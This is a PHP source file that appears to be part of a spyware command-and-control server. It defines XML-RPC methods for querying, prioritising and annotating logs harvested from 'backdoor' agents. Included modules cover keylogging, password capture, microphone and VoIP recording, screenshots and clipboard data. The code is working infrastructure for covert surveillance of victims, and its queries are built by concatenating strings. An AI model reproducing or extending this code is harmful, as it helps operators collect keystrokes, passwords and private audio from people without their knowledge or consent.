<?php

//////////
///
///   log.inc.php
///
//////////

require_once('lib/commons.inc.php');

require_once('methods/log/log_clipboard.inc.php');
require_once('methods/log/log_config.inc.php');
require_once('methods/log/log_download.inc.php');
require_once('methods/log/log_filecap.inc.php');
require_once('methods/log/log_fileopen.inc.php');
require_once('methods/log/log_keylog.inc.php');
require_once('methods/log/log_mic.inc.php');
require_once('methods/log/log_password.inc.php');
require_once('methods/log/log_print.inc.php');
require_once('methods/log/log_snapshot.inc.php');
require_once('methods/log/log_upload.inc.php');
require_once('methods/log/log_url.inc.php');
require_once('methods/log/log_voip.inc.php');



/*************\
*   METHODS   *
\*************/

if($al & AL_VIEW) {
   $dm['log.getparam']            ['function'] = 'log_getparam';
//   $dm['log.getparam']           ['signature'] = array(array($xmlrpcStruct,     // return value
//                                                             $xmlrpcArray));    // $selarray
}

if($al & AL_VIEW) {
   $dm['log.getgeneral']          ['function'] = 'log_getgeneral';
//   $dm['log.getgeneral']         ['signature'] = array(array($xmlrpcArray,      // return value
//                                                             $xmlrpcArray,      // $selarray
//                                                             $xmlrpcArray,      // $typearray
//                                                             $xmlrpcArray,      // $backdoorarray
//                                                             $xmlrpcArray,      // $remoteiparray
//                                                             $xmlrpcArray,      // $remotehostarray
//                                                             $xmlrpcArray,      // $remoteuserarray
//                                                             $xmlrpcArray,      // $tagarray
//                                                             $xmlrpcArray,      // $acquiredarray
//                                                             $xmlrpcString));   // $searchstring
}

if($al & AL_VIEW) {
   $dm['log.setgrouppriority']    ['function'] = 'log_setgrouppriority';
//   $dm['log.setgrouppriority']   ['signature'] = array(array($xmlrpcBoolean,    // return value
//                                                             $xmlrpcArray,      // $selarray
//                                                             $xmlrpcArray,      // $linearray
//                                                             $xmlrpcInt));      // $priority
}

if($al & AL_VIEW) {
   $dm['log.setidpriority']       ['function'] = 'log_setidpriority';
//   $dm['log.setidpriority']      ['signature'] = array(array($xmlrpcBoolean,    // return value
//                                                             $xmlrpcArray,      // $logarray
//                                                             $xmlrpcInt));      // $priority
}

if($al & AL_VIEW) {
   $dm['log.addnote']             ['function'] = 'log_addnote';
//   $dm['log.addnote']            ['signature'] = array(array($xmlrpcBoolean,    // return value
//                                                             $xmlrpcBoolean,    // $private
//                                                             $xmlrpcString,     // $content
//                                                             $xmlrpcArray));    // $logarray
}

if($al & AL_VIEW) {
   $dm['log.delnote']             ['function'] = 'log_delnote';
//   $dm['log.delnote']            ['signature'] = array(array($xmlrpcBoolean,    // return value
//                                                             $xmlrpcArray));    // $notearray
}

if($al & AL_VIEW) {
   $dm['log.getnote']             ['function'] = 'log_getnote';
//   $dm['log.getnote']            ['signature'] = array(array($xmlrpcArray,      // return value
//                                                             $xmlrpcArray));    // $logarray
}



/***************\
*   FUNCTIONS   *
\***************/

function log_getparam($selarray)
{
   $ret = db_escape(array(&$selarray));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT MAX(`log_id`) AS `maxlog`";
   $sql .= "FROM `log`";

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   $_SESSION['authmaxlog'] = (integer)$ret[0]->maxlog;

   $sql  = "SELECT DISTINCT `type`, ";
   $sql .=                 "`backdoor`, ";
   $sql .=                 "`remoteip`, ";
   $sql .=                 "`remotehost`, ";
   $sql .=                 "`remoteuser` ";
   $sql .= "FROM `log` ";
   $sql .= "JOIN `backdoor` ";
   $sql .= "USING (`backdoor_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   $sql .=       "(`log_id` <= ".$_SESSION['authmaxlog'].")";

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   foreach(array('type', 'backdoor', 'remoteip', 'remotehost', 'remoteuser') as $field) {
      $tmp->$field = array();
      foreach($ret as $r) {
         array_push($tmp->$field, $r->$field);
      }
      $tmp->$field = array_unique($tmp->$field);
      sort($tmp->$field);
   }
 
   $ret = $tmp;

   return $ret;
}

function log_getgeneral($selarray, $typearray, $backdoorarray, $remoteiparray, $remotehostarray, $remoteuserarray, $tagarray, $acquiredarray, $searchstring)
{
   $ret = db_escape(array(&$selarray,
                          &$typearray,
                          &$backdoorarray,
                          &$remoteiparray,
                          &$remotehostarray,
                          &$remoteuserarray,
                          &$tagarray,
                          &$acquiredarray,
                          &$searchstring));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT `type`, ";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray') as $field) {
      $sql .= (count($$field) ? "`".str_replace('array', '', $field)."`, " : '');
   }
   $sql .=         "COUNT(`log_id`) AS `count`, ";
   $sql .=         "DATE_FORMAT(MIN(`acquired`), '%Y%m%dT%T') AS `begin`, ";
   $sql .=         "DATE_FORMAT(MAX(`acquired`), '%Y%m%dT%T') AS `end`, ";
   $sql .=         "LEAST(SUM(LENGTH(`longtext1`) + LENGTH(`longblob1`)), 1073741825) AS `size`, ";
   $sql .=         "MAX(`tag`) AS `priority` ";
   $sql .= "FROM `log` ";
   $sql .= "JOIN `backdoor` ";
   $sql .= "USING (`backdoor_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   foreach(array('typearray', 'backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray', 'tagarray') as $field) {
      $sql .= (count($$field) ? "(`".str_replace('array', '', $field)."` IN ('".implode("', '", $$field)."')) AND " : '');
   }
   if($searchstring) {
      $sql .= "(0";
      foreach(array('varchar1', 'varchar2', 'varchar3', 'longtext1') as $field) {
         $sql .= " OR (`$field` REGEXP '$searchstring')";
      }
      $sql .= ") AND ";
   }
   if(count($acquiredarray)) {
      $sql .= "(0";
      foreach($acquiredarray as $acquired) {
         $sql .= " OR (`acquired` BETWEEN '".str_replace(':', '', $acquired['begin']->scalar)."' AND '".str_replace(':', '', $acquired['end']->scalar)."')";
      }
      $sql .= ") AND ";
   }
   $sql .=       "(`log_id` <= ".$_SESSION['authmaxlog'].") ";
   $sql .= "GROUP BY `type`";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray', 'tagarray') as $field) {
      $sql .= (count($$field) ? ", `".str_replace('array', '', $field)."`" : '');
   }

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   foreach($ret as &$r) {
      settype($r->count, 'integer');
      xmlrpc_set_type($r->begin, 'datetime');
      xmlrpc_set_type($r->end, 'datetime');
      settype($r->size, 'integer');
      settype($r->priority, 'integer');
   }

   return $ret;
}

function log_setgrouppriority($selarray, $linearray, $priority)
{
   $ret = db_escape(array(&$selarray,
                          &$linearray,
                          &$priority));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "REPLACE INTO `log` (`log_id`, ";
   $sql .=                     "`tag`, ";
   $sql .=                     "`type`, ";
   $sql .=                     "`backdoor_id`, ";
   $sql .=                     "`remoteip`, ";
   $sql .=                     "`remotehost`, ";
   $sql .=                     "`remoteuser`, ";
   $sql .=                     "`received`, ";
   $sql .=                     "`acquired`, ";
   $sql .=                     "`varchar1`, ";
   $sql .=                     "`varchar2`, ";
   $sql .=                     "`varchar3`, ";
   $sql .=                     "`int1`, ";
   $sql .=                     "`int2`, ";
   $sql .=                     "`int3`, ";
   $sql .=                     "`longtext1`, ";
   $sql .=                     "`longblob1`) ";
   $sql .= "SELECT `log_id`, ";
   $sql .=        "$priority, ";
   $sql .=        "`type`, ";
   $sql .=        "`backdoor_id`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`received`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`varchar2`, ";
   $sql .=        "`varchar3`, ";
   $sql .=        "`int1`, ";
   $sql .=        "`int2`, ";
   $sql .=        "`int3`, ";
   $sql .=        "`longtext1`, ";
   $sql .=        "`longblob1` ";
   $sql .= "FROM `log` ";
   $sql .= "LEFT JOIN `backdoor` USING (`backdoor_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   if(count($linearray)) {
      $sql .= "(0";
      foreach($linearray as $line) {
         if(!isset($line['type'])) {
            continue;
         }
         $sql .= " OR ((`type` = '".$line['type']."')";
         foreach(array('backdoor', 'remoteip', 'remotehost', 'remoteuser') as $field) {
            $sql .= (isset($line[$field]) ? " AND (`$field` = '".$line[$field]."')" : '');
         }
         $sql .= (isset($line['priority']) ? " AND (`tag` = '".$line['priority']."')" : '');
         if(isset($line['search']) && $line['search']) {
            $sql .= " AND (0";
            foreach(array('varchar1', 'varchar2', 'varchar3', 'longtext1') as $field) {
               $sql .= " OR (`$field` REGEXP '".$line['search']."')";
            }
            $sql .= ")";
         }
         if(isset($line['begin']) && isset($line['end'])) {
            $sql .= " AND (`acquired` BETWEEN '".str_replace(':', '', $line['begin']->scalar)."' AND '".str_replace(':', '', $line['end']->scalar)."')";
         }
         $sql .= ")";
      }
      $sql .= ") AND ";
   }
   $sql .=       "(`log_id` <= ".$_SESSION['authmaxlog'].")";

   $ret = db_query($sql);

   return $ret;
}


function log_setidpriority($logarray, $priority)
{
   $ret = db_escape(array(&$logarray,
                          &$priority));

   if(is_object($ret)) {
      return $ret;
   }

   $selarray = array();

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "UPDATE `log` ";
   $sql .= "SET `tag` = $priority ";
   $sql .= "WHERE (`log_id` IN ('".implode("', '", $logarray)."'))";

   $ret = db_query($sql);

   return $ret;
}

function log_addnote($private, $content, $logarray)
{
   $user_id = $_SESSION['authuserid'];

   $ret = db_escape(array(&$private,
                          &$content,
                          &$logarray,
                          &$user_id));

   if(is_object($ret)) {
      return $ret;
   }

   $selarray = array();

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "INSERT INTO `note` (`timestamp`, ";
   $sql .=                     "`content`, ";
   $sql .=                     "`log_id`, ";
   $sql .=                     "`user_id`) ";
   $sql .= "SELECT UTC_TIMESTAMP(), ";
   $sql .=        "'$content', ";
   $sql .=        "`log_id`, ";
   $sql .= ($private ? "'$user_id'" : "NULL")." ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE (`log_id` IN ('".implode("', '", $logarray)."'))";

   $ret = db_query($sql);

   return $ret;
}

function log_delnote($notearray)
{
   $user_id = $_SESSION['authuserid'];

   $ret = db_escape(array(&$notearray,
                          &$user_id));

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "DELETE FROM `note` ";
   $sql .= "WHERE (`note_id` IN ('".implode("', '", $notearray)."')) AND ";
   $sql .=        "((`user_id` = '$user_id') OR ";
   $sql .=        "(`user_id` IS NULL))";

   $ret = db_query($sql);

   return $ret;
}

function log_getnote($logarray)
{
   $user_id = $_SESSION['authuserid'];

   $ret = db_escape(array(&$logarray,
                          &$user_id));

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT `note_id` AS `note`, ";
   $sql .=        "IF(ISNULL(`user_id`), 0, 1) AS `private`, ";
   $sql .=        "DATE_FORMAT(`timestamp`, '%Y%m%dT%T') AS `timestamp`, ";
   $sql .=        "`content`, ";
   $sql .=        "`log_id` AS `log` ";
   $sql .= "FROM `note` ";
   $sql .= "WHERE (`log_id` IN ('".implode("', '", $logarray)."')) AND ";
   $sql .=       "((`user_id` = '$user_id') OR ";
   $sql .=       "(`user_id` IS NULL))";

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   foreach($ret as &$r) {
      settype($r->note, 'integer');
      settype($r->private, 'boolean');
      xmlrpc_set_type($r->timestamp, 'datetime');
      settype($r->log, 'integer');
   }
   unset($r);

   return $ret;
}

?>
